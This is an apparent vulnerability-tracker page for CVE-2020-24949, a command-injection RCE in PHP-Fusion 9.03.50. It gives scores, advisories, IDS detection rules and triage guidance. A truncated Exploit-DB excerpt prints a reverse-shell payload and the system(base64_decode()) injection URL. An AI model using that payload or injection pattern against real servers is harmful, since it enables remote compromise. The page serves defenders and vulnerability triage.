CVE-2020-24949
published 2020-09-03CVE-2020-24949: Privilege escalation in PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform…
PriorityP187high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
67.29%
99.2th percentile
Privilege escalation in PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution (RCE).
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php-fusion | php-fusion | — | — |
Detection & IOCsextracted from sources · hover to see the quote
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET WEB_SPECIFIC_APPS PHP-Fusion Downloads.php Command Injection (CVE-2020-24949)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/infusions/"; content:"downloads.php?cat_id=|24 7b|system"; fast_pattern; reference:url,github.com/r90tpass/CVE-2020-24949/blob/main/exp.py; reference:cve,2020-24949; classtype:attempted-admin; sid:2033462; rev:1; metadata:created_at 2021_07_27, cve CVE_2020_24949, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_27, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
bytes
|24 7b|system
- →Look for GET requests to /infusions/downloads/downloads.php where the cat_id parameter contains a ${ or ${{ template injection pattern invoking system(), base64_decode(), or other PHP functions.
- →A successful exploitation response will contain the string 'infusion_db.php' in the HTTP response body — use this as a confirmation matcher.
- →The exploit base64-encodes the reverse-shell payload to avoid '+' and '=' characters in the URL; look for base64_decode() calls inside the cat_id parameter as an evasion indicator. ↗
- →The exploit requires the PHP-Fusion 'Allow PHP Execution' feature to be enabled; verify this setting when triaging alerts. ↗
- ·Exploitation requires the 'Allow PHP Execution' feature to be enabled in PHP-Fusion configuration; the vulnerability is not exploitable without this setting. ↗
- ·The exploit payload must not contain '+' or '=' characters (e.g., from base64 padding) in the URL; attackers craft payloads specifically to avoid these characters. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
vulncheck8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-vrxg-55c7-pjh6: Privilege escalation in PHP-Fusion 9
ghsa_unreviewed·2022-05-24
CVE-2020-24949 [HIGH] CWE-269 GHSA-vrxg-55c7-pjh6: Privilege escalation in PHP-Fusion 9
Privilege escalation in PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution (RCE).
VulnCheck
PHP-Fusion 9.03.50 downloads/downloads.php Authenticated Remote Code Execution
vulncheck·2020·CVSS 8.8
CVE-2020-24949 [HIGH] PHP-Fusion 9.03.50 downloads/downloads.php Authenticated Remote Code Execution
PHP-Fusion 9.03.50 downloads/downloads.php Authenticated Remote Code Execution
Privilege escalation in PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution (RCE).
Affected: php-fusion php-fusion
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2020-24949; https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scan
Suricata
ET WEB_SPECIFIC_APPS PHP-Fusion Downloads.php Command Injection (CVE-2020-24949)
suricata·2021-07-27·CVSS 8.8
CVE-2020-24949 [HIGH] ET WEB_SPECIFIC_APPS PHP-Fusion Downloads.php Command Injection (CVE-2020-24949)
ET WEB_SPECIFIC_APPS PHP-Fusion Downloads.php Command Injection (CVE-2020-24949)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET WEB_SPECIFIC_APPS PHP-Fusion Downloads.php Command Injection (CVE-2020-24949)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/infusions/"; content:"downloads.php?cat_id=|24 7b|system"; fast_pattern; reference:url,github.com/r90tpass/CVE-2020-24949/blob/main/exp.py; reference:cve,2020-24949; classtype:attempted-admin; sid:2033462; rev:1; metadata:created_at 2021_07_27, cve CVE_2020_24949, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_27, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitati
Exploit-DB
PHPFusion 9.03.50 - Remote Code Execution
exploitdb·2021-05-28·CVSS 8.8
CVE-2020-24949 [HIGH] PHPFusion 9.03.50 - Remote Code Execution
PHPFusion 9.03.50 - Remote Code Execution
---
# Exploit Title: PHPFusion 9.03.50 - Remote Code Execution
# Date: 20/05/2021
# Exploit Author: g0ldm45k
# Vendor Homepage: https://www.php-fusion.co.uk/home.php
# Software Link: https://www.php-fusion.co.uk/infusions/downloads/downloads.php?cat_id=30&download_id=606
# Version: 9.03.50
# Tested on: Docker + Debian GNU/Linux 8 (jessie)
# CVE : CVE-2020-24949
# Found by: ThienNV
import requests
import base64
import argparse
PAYLOAD = "php -r '$sock=fsockopen(\"127.0.0.1\",4444);exec(\"/bin/sh -i &4 2>&4\");' " # !!spaces are important in order to avoid ==!!
REQUEST_PAYLOAD = "/infusions/downloads/downloads.php?cat_id=$\{{system(base64_decode({})).exit\}}"
parser = argparse.ArgumentParser(description='Send a payload to a Fusion 9.03.50 serv
Nuclei
PHP-Fusion 9.03.50 - Remote Code Execution
nuclei·CVSS 8.8
CVE-2020-24949 [HIGH] PHP-Fusion 9.03.50 - Remote Code Execution
PHP-Fusion 9.03.50 - Remote Code Execution
PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution.
Template:
id: CVE-2020-24949
info:
name: PHP-Fusion 9.03.50 - Remote Code Execution
author: geeknik
severity: high
description: PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution.
impact: |
Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected system, potentially leading to full compromise.
remediation: |
Apply the latest security patch or upgrade to a non-vulnerable version of PHP-Fusion.
reference:
- https://packetstormsec
No writeups or analysis indexed.
2020-09-03
Published
Exploited in the wild